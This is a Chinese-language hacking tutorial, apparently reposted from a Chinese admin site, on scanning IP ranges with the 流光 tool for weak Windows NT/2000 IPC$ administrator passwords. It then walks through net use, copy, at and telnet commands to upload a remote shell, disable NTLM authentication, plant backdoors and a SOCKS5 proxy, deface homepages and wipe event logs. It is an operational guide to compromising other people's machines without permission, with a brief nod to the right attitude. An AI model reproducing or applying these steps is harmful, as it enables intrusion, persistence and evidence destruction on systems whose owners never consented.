很长时间也没有写什么东西了,这源于我的懒惰和生活缺乏激情。我的记事本上一大篇都是欠朋友的承诺 :(
你既然看到这儿了,就在听我牢骚几句吧:)搞安全应该有正确的心态,别以为你会了个工具使用就可以一步登天。
交流、学习才是最重要的,把自己心态放正,无论我们是高还是低。
今天要写的是流光的IPC探测:
一、目的和任务:
1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。
2、学习IPC探测的相关知识。
二、探测流程:
1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/
2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!
什么是IPC:
IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。
IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。
注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。
中国网管联盟bitsCN.com
可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …
2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC
探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得
到弱口令)。
在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。
图main1
图main2
3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机
4、探测中…… (start1)
(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样)
5、这是扫描到的NT/98主机列表:(jg1)
6、没有扫描到常用密码:(
7、就不要查看报告了 :…
8、有了不少NT/98的机器了,正式开始IPC$探测:IPC$主机-探测-探测所有IPC$用户列表。
中国网管论坛bbs.bitsCN.com
9、注意下面两个对话框的设置:全选上,我们只要IPC$管理员的弱口令。然后点选项
10、点“选项” :为了加快弱口令扫描速度,这里的两个我们可以全部取消,比如下面的那个,如果对方禁止列出用户了,我想对于一个网管来说,弱口令可能性也是微乎其微。
11、探测中……
12、有密码了:)
13、又出现了查看报告的窗口,看看 :)
14、有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办法么? :)有的是 !自己看看工具-
菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。
15、黑了他 !
开个dos prompt 执行如下命令,本次用的例子如下图。
1、 net use file://对方ip/ipc$ "密码" /user:"用户名" || 建立远程连接
2、 copy icmd.exe file://对方ip/admin$ || admin$是对方的winnt目录 :) 这里文件多。
3、 net time file://对方IP/ || 看看对方的本地时间
4、at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数|| 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。
网管bitscn_com
5、 telnet 对方ip 端口||
6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||
7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe
图cmd1
图cmd2
如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\ .
假如首页文件是default.htm并且在c:\interpub\wwwroot,这样:copy default.htm \\ip\c$\interpub\wwwroot
下面的图有演示
7、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:)
执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :)
8、做个SOCK5代理玩玩,用在QQ上不错喔:
执行我们copy过去的sock -install,net start skserver 看看用在QQ上的效果:)
是不是没有看清上面的步骤呢?
网管网www.bitscn.com
下面是我telnet 上去后所有的命令:)
9、还能做成其他的么 ?
当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :)
10、日志清除,断开连接 :
执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use file://ip/ipc$ /delete
这步我认为是必需的,尤其是在一些有争议的站点上,或者是国内的站点,除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。
在网吧写完 :( 错误之处请赐教。
只要是学习、谁都会遇到困难,我也是问题多多,还得向小榕、EKIN讨教,欢迎大家多交流 :)
评论加载中…
